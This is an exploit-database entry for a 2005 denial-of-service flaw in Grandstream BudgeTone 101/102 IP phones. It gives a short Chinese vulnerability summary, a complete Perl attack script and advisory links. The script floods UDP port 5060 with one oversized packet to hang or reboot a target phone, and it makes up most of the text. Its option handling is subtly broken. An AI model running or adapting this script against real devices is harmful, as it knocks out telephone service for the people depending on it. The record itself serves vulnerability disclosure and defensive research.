https://www.exploit-db.com/exploits/1153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-150

GrandstreamBudgeTone101和102运行固件1.0.6.7及可能早期版本允许远程攻击者借助于对5060端口的大的UDP包造成拒绝服务(设备挂起或重启)。

#!/usr/bin/perl
#
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ###################################
system ("clear");
print "nGrandstream BT101/BT102 DoSn";
print "written by pierre kroma ([email protected])nn";

if (!$ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot' 	the Grandstream BT 101/102
	-s = 'shutdown' the Grandstream BT 101/102

~; exit;}
################################## D E F I N I T I O N S####################

$victim = $ARGV[0];
$port = $ARGV[1];
$option = $ARGV[2];

if ( $option == 'r' || $option == 'R' )
{	$request= 'k'x65534;}

if ( $option == 's' || $option == 'S' )
{	$request= 'p'x65535;}
else
{	print "Wrong parameter - try it again";
	exit;
}


# ping the remote device
print color 'bold blue';
print "nping the remote device $victimn";
print color 'reset';
system("ping -c 3 $victim");

print color 'bold red';
print "n Wait ... nnn";
print color 'reset';
$sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim");

print $sox $request;
sleep 1;
close $sox;

# ping the remote device
print color 'bold blue';
print "ping the remote device $victim againn";
print color 'reset';
system("ping -c 3 $victim");

# milw0rm.com [2005-08-12]

来源:SECTRACK
名称:1014665
链接:http://securitytracker.com/id?1014665
来源:BID
名称:14539
链接:http://www.securityfocus.com/bid/14539
来源:SECUNIA
名称:16438
链接:http://secunia.com/advisories/16438
来源:BUGTRAQ
名称:20050812GrandstreamBudgeTone101/102DoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112388062328906&w;=2